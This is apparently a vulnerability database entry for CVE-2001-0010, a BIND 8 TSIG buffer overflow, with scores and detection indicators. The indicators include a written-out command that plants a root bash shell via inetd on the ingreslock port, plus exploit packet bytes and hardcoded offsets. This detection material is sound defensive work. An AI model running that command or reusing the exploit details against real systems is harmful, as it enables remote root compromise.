CVE-2001-0010
published 2001-02-12

CVE-2001-0010: Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.

Priority: P354, critical, 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 31.62% (98.1th percentile)

Affected

3 ranges
Vendor | Product | Version range | Fixed in
isc | bind | |
isc | bind | |
isc | bind | |

Detection & IOCs (extracted from sources)

port: 53/udp
port: 53/tcp
command: /bin/echo 'ingreslockstream tcp nowait root /bin/bash bash -i' > /tmp/.inetd.conf; /usr/sbin/inetd /tmp/.inetd.conf
bytes: ab cd 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61
bytes: 00 fa ff (TSIG type 0xfa, class ANY 0xff in DNS additional record)
bytes: 00 00 fa ff (TSIG AR terminator sequence in exploit packets)
  • Detect DNS UDP infoleak probe packets: short (~23 byte) UDP DNS packets with the specific byte sequence AB CD 09 80 sent to port 53, used by exploits to leak the named process stack pointer before the overflow.
  • Detect DNS query packets with DNS ID 0xDEAD containing a TSIG additional record (type 0xFA) — second stage of the exploit delivering the overflow payload.
  • Detect a TCP connection to port 53 immediately followed by UDP DNS packets to the same target — the exploit establishes a TCP shell-back channel on port 53 while sending the overflow via UDP.
  • Detect DNS NAME fields in query records that contain x86 shellcode patterns (e.g., JMP/CALL sequences, int 0x80 syscall bytes 0xcd 0x80) embedded within label segments — shellcode is smuggled inside DNS NAME fields.
  • The xtract_offset() values (argevdisp1 = 0x080d7cd0, argevdisp2 from offset 0x264 of infoleak response) are hardcoded for a specific BIND compilation and will differ across builds.

CVSS provenance

nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat | 10.0 | CRITICAL